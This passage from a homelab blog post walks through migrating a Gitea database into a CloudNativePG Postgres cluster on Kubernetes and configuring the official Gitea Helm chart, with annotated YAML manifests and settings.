<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>psql -U gogs -h ingress-internal.service.consul -p <span style="color:#ae81ff">5577</span> -d gitea
</span></span></code></pre></div><p>With that, I finally had access to the Postgres cluster from inside my k8s
cluster.</p>
<p>The CNPG Cluster manifest then looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">gitea-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">gitea</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageName</span>: <span style="color:#e6db74">&#34;ghcr.io/cloudnative-pg/postgresql:17.2&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initdb</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">gitea</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">gitea</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">import</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">microservice</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">databases</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">gitea</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">source</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">externalCluster</span>: <span style="color:#ae81ff">nomad-pg</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200M</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">150m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_connections</span>: <span style="color:#e6db74">&#34;200&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">shared_buffers</span>: <span style="color:#e6db74">&#34;50MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_cache_size</span>: <span style="color:#e6db74">&#34;150MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">maintenance_work_mem</span>: <span style="color:#e6db74">&#34;12800kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">checkpoint_completion_target</span>: <span style="color:#e6db74">&#34;0.9&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_buffers</span>: <span style="color:#e6db74">&#34;1536kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">default_statistics_target</span>: <span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">random_page_cost</span>: <span style="color:#e6db74">&#34;1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_io_concurrency</span>: <span style="color:#e6db74">&#34;300&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">work_mem</span>: <span style="color:#e6db74">&#34;128kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">huge_pages</span>: <span style="color:#e6db74">&#34;off&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_wal_size</span>: <span style="color:#e6db74">&#34;128MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_keep_size</span>: <span style="color:#e6db74">&#34;512MB&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">1.</span><span style="color:#ae81ff">5G</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">barmanObjectStore</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-gitea</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-gitea</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retentionPolicy</span>: <span style="color:#e6db74">&#34;30d&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">externalClusters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nomad-pg</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">connectionParameters</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">host</span>: <span style="color:#ae81ff">ingress-internal.service.consul</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#e6db74">&#34;5577&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">user</span>: <span style="color:#ae81ff">gogs</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dbname</span>: <span style="color:#ae81ff">gitea</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">password</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">olddb-secret</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">pw</span>
</span></span></code></pre></div><p>I&rsquo;ve omitted some standard things like the backup bucket setup here. The important
parts for the migration are the <code>spec.bootstrap.initdb.import</code> and <code>spec.externalClusters</code>
keys.</p>
<p>Let&rsquo;s start with the <code>externalClusters</code> definition. It&rsquo;s documented <a href="https://cloudnative-pg.io/documentation/1.25/bootstrap/#the-externalclusters-section">here</a> and describes the connection to another cluster. This doesn&rsquo;t need to be
a CNPG cluster. One problem was that seemingly, no documentation exists of the
<code>externalClusters.connectionParameters.port</code> option. I spend quite a while
trying to figure out whether the port was supposed to go on the end of the <code>host</code>
parameter, or whether it was a separate key.
I was finally saved by the fact that CNPG is open source, and so I could look
at the code - specifically a Yaml file from their test setup <a href="https://github.com/cloudnative-pg/cloudnative-pg/blob/62d48282bdd4c640d1af104b9cf637087148075e/tests/e2e/fixtures/replica_mode_cluster/cluster-replica-tls.yaml.template#L22">here</a>.
The password for the connection was coming from a Secret with the old database
credentials. As you can see in the <code>user</code> parameter, the Gitea database was
originally created during the Gogs phase of my Git hosting. &#x1f601;</p>
<p>The second part of the config is in <code>spec.bootstrap.initdb.import</code>, which tells
CNPG what it should import from the external cluster.
The first choice to make here is the <code>type</code> of the import. This describes the
destination cluster, meaning the new CNPG cluster. The choices are <code>microservice</code>,
meaning that the cluster serves only one app with one user, or <code>monolith</code>,
meaning a cluster hosting the databases of multiple services.
Besides that, I just needed to provide the name of the database in the source
cluster and the name of said cluster in the <code>externalClusters</code> list.</p>
<p>This import, as configured above, worked immediately. I was very positively
surprised. All data was imported properly, and CNPG automatically created the
customary Secret with the connection details and credentials for accessing
the cluster.
After the initial import, I was able to remove the <code>spec.bootstrap.initdb.import</code>
and <code>externalClusters</code> keys completely from the manifest without any error.</p>
<h2 id="helm-chart">Helm Chart</h2>
<p>For the Gitea deployment itself, I made use of the <a href="https://gitea.com/gitea/helm-chart">official Helm chart</a>.
It is one of the better ones I&rsquo;ve encountered since starting the migration,
providing the ability to set config options in the <code>values.yaml</code> instead of
having to maintain a separate <code>app.init</code> file. What I value extremely highly
is that they provide the ability to add environment variables via <code>env.ValueFrom</code>,
so I can directly use the automatically created Secrets from CNPG for the DB
and Rook Ceph for the S3 bucket. This safes me the roundabout setup I had to do
for other charts, where I had to use external-secrets to template the auto
Secrets into new Secrets with a different format to conform to the Chart&rsquo;s
expectations.</p>
<p>One downside at the time of writing is that the chart is not on the newest
Gitea version 1.23.1. But I just changed the image tag and chart version 10.6.0
worked without issue.
Going by <a href="https://gitea.com/gitea/helm-chart/issues/783">this GitHub issue</a> the
delay is simply due to some internal refactoring of the chart they want to finish
before the next release.</p>
<p>I will split the exploration of my <code>values.yaml</code> file into two parts, one with
the Gitea config under the <code>gitea</code> key and one for everything else.</p>
<h3 id="everything-besides-the-gitea-config">Everything besides the Gitea config</h3>
<p>Let&rsquo;s start with the &ldquo;everything else&rdquo; part:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">replicaCount</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">image</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">rootsless</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tag</span>: <span style="color:#e6db74">&#34;1.23.1&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">Recreate</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">containerSecurityContext</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">add</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">SYS_CHROOT</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ssh</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">2222</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">git.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">very-safe-entrypoint</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">host</span>: <span style="color:#ae81ff">gitea.example.com</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">paths</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">pathType</span>: <span style="color:#ae81ff">Prefix</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tls</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">gitea.example.com</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1500Mi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">create</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mount</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">gitea-data-volume</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">signing</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">actions</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">redis-cluster</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">postgresql-ha</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>As I noted above, I had to hardcode the Gitea tag for now, because the newest
chart version is still on 1.22.3. I also opted for using the rootless image,
which I did not use in the Nomad job. It just is a little bit nicer than
having a root-capable image, although Gitea automatically drops root privileges
at startup and even with the root image, Gitea doesn&rsquo;t actually run as root.</p>
<p>I also had to hardcode the update strategy to <code>Recreate</code>. I&rsquo;m not sure why
it&rsquo;s set to rolling updates by default. This doesn&rsquo;t really work, because
Gitea is launched in a Deployment and has a PVC mounted, so the newly started
instance won&rsquo;t actually be able to start because the RWO volume can&rsquo;t be mounted
in two Pods at the same time.</p>
<p>Then comes an important one, the <code>SYS_CHROOT</code> capability. This is documented as
required when using <a href="https://cri-o.io/">cri-o</a> as the container runtime in the
Helm chart&rsquo;s extensive <a href="https://gitea.com/gitea/helm-chart/src/tag/v10.6.0/README.md">README.md</a>.</p>
<p>External access is split between two different subdomains, one for Gitea&rsquo;s web
frontend going through my Traefik ingress and one for git access with SSH. I
like setting my LoadBalancer services, <a href="https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/">provided by Cilium</a>,
to the Local <code>externalTrafficPolicy</code>. This ensures that the client IP those
services see are the actual client IPs, and not the IPs of the machine which
received the request and forwarded it to the service it was intended for.
The <code>homelab/public-service</code> label is simply a sign for Cilium that it should
handle the service.</p>
<p>The ingress config has one important point, the <code>tls</code> key. I initially did not
set that key, because I&rsquo;ve never set it before - my Traefik automatically
uses HTTPS and I&rsquo;m using a wildcard cert. But Gitea needs to generate publicly
addressable URLs for some things, e.g. when providing clone URLs for HTTPS or
providing callback URLs in webhooks, e.g. for Woodpecker.
The domain itself is fine, but the chart determines the protocol like this:</p>
<pre tabindex="0"><code>{{- define &#34;gitea.public_protocol&#34; -}}
{{- if and .Values.ingress.enabled (gt (len .Values.ingress.tls) 0) -}}
https
{{- else -}}
{{ .Values.gitea.config.server.PROTOCOL }}
{{- end -}}
{{- end -}}
</code></pre><p>In there, <code>https</code> is only set as the protocol if the <code>ingress.tls</code> list has at
least one entry. And setting the <code>server.PROTOCOL</code> config comes with it&rsquo;s own
problems, so I decided to just add the <code>tls.hosts</code> setting, even if it means
that I have to repeat my Gitea domain a number of times in the <code>config.yaml</code>.</p>
<p>For the <code>persistence</code> setting I had to go with a pre-created volume, because
I had to make the migrated Gitea data available. One thing to note here is
that you should delete the <code>app.ini</code> file your previous setup might have left
on the disk. The init container which puts together the <code>app.ini</code> from the
values and env variables and so on doesn&rsquo;t handle it well when there&rsquo;s an
existing <code>app.ini</code> it didn&rsquo;t create itself.</p>
<p>I also disabled a number of features I didn&rsquo;t need, like signing or actions
or the Redis and Postgres instances the Helm chart can deploy, because I&rsquo;ve
already got my own deployments.</p>
<h3 id="the-gitea-config">The Gitea config</h3>
<p>Here&rsquo;s the full <code>gitea:</code> section of the <code>config.yaml</code>, just for reference. I
will post the relevant subsections as I go over them:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">oauth</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;Keycloak&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">provider</span>: <span style="color:#e6db74">&#34;openidConnect&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">oidc-credentials</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">autoDiscoverUrl</span>: <span style="color:#e6db74">&#34;https://key.example.com/realms/homelab/.well-known/openid-configuration&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">APP_NAME</span>: <span style="color:#e6db74">&#34;My Gitea&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">RUN_MODE</span>: <span style="color:#e6db74">&#34;prod&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SSH_SERVER_HOST_KEYS</span>: <span style="color:#e6db74">&#34;ssh/gitea.ed25519&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">APP_DATA_PATH</span>: <span style="color:#e6db74">&#34;/data/gitea_data&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SSH_DOMAIN</span>: <span style="color:#e6db74">&#34;git.example.com&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SSH_PORT</span>: <span style="color:#ae81ff">2222</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">database</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DB_TYPE</span>: <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">LOG_SQL</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">oauth2</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DISABLE_REGISTRATION</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">REQUIRE_SIGNIN_VIEW</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_KEEP_EMAIL_PRIVATE</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ALLOW_CREATE_ORGANIZATION</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ORG_VISIBILITY</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ORG_MEMBER_VISIBLE</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ENABLE_TIMETRACKING</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SHOW_REGISTRATION_BUTTON</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repository</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ROOT</span>: <span style="color:#e6db74">&#34;/data/git-repos&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCRIPT_TYPE</span>: <span style="color:#ae81ff">bash</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_PRIVATE</span>: <span style="color:#ae81ff">private</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_BRANCH</span>: <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ui</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_THEME</span>: <span style="color:#ae81ff">gitea-auto</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">queue</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">TYPE</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">CONN_STR</span>: <span style="color:#e6db74">&#34;addr=redis.redis.svc.cluster.local:6379&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">WORKERS</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">BOOST_WORKERS</span>: <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_EMAIL_NOTIFICATIONS</span>: <span style="color:#ae81ff">disabled</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">openid</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLE_OPENID_SIGNIN</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">webhook</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ALLOWED_HOST_LIST</span>: <span style="color:#ae81ff">private</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mailer</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SUBJECT_PREFIX</span>: <span style="color:#e6db74">&#34;[Gitea]&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SMTP_ADDR</span>: <span style="color:#ae81ff">mail.example.com</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SMTP_PORT</span>: <span style="color:#e6db74">&#34;465&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">FROM</span>: <span style="color:#e6db74">&#34;gitea@example.com&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">USER</span>: <span style="color:#e6db74">&#34;gitea@example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cache</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ADAPTER</span>: <span style="color:#e6db74">&#34;redis&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">INTERVAL</span>: <span style="color:#ae81ff">60</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">HOST</span>: <span style="color:#e6db74">&#34;network=tcp,addr=redis.redis.svc.cluster.local:6379,db=0,pool_size=100,idle_timeout=180&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ITEM_TTL</span>: <span style="color:#ae81ff">7d</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">session</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">PROVIDER</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">PROVIDER_CONFIG</span>: <span style="color:#ae81ff">network=tcp,addr=redis.redis.svc.cluster.local:6379,db=0,pool_size=100,idle_timeout=180</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">time</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_UI_LOCATION</span>: <span style="color:#e6db74">&#34;Europe/Berlin&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.archive_cleanup</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.update_mirrors</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.repo_health_check</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;0 30 5 * * *&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">TIMEOUT</span>: <span style="color:#e6db74">&#34;5m&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.check_repo_stats</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;0 0 5 * * *&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.update_migration_poster_id</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.sync_external_users</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
